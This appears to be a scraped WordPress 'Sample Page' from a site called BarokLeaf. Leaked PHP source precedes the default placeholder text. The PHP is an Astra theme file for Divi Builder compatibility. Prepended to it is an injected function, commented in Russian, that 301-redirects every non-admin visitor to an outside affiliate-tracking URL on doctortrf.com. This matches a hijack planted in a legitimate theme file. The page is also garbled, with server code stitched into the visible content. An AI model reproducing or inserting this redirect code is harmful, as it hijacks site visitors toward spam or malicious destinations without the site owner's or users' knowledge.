function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = 'https://faq95.doctortrf.com/l/?sub1=[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * Divi Builder File. * * @package Astra */ // If plugin - 'Divi Builder' not exist then return. if ( ! class_exists( 'ET_Builder_Plugin' ) ) { return; } /** * Astra Divi Builder */ if ( ! class_exists( 'Astra_Divi_Builder' ) ) : /** * Astra Divi Builder * * @since 1.4.0 */ class Astra_Divi_Builder { /** * Member Variable * * @var object instance */ private static $instance; /** * Initiator */ public static function get_instance() { if ( ! isset( self::$instance ) ) { self::$instance = new self(); } return self::$instance; } /** * Constructor */ public function __construct() { add_filter( 'astra_theme_assets', array( $this, 'add_styles' ) ); } /** * Add assets in theme * * @param array $assets list of theme assets (JS & CSS). * @return array List of updated assets. * @since 1.4.0 */ public function add_styles( $assets ) { $assets['css']['astra-divi-builder'] = 'compatibility/divi-builder'; return $assets; } } endif; /** * Kicking this off by calling 'get_instance()' method */ Astra_Divi_Builder::get_instance(); Sample Page – BarokLeaf

Sample Page

This is an example page. It’s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:

Hi there! I’m a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like piña coladas. (And gettin’ caught in the rain.)

…or something like this:

The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.

As a new WordPress user, you should go to your dashboard to delete this page and create new pages for your content. Have fun!

Shopping Cart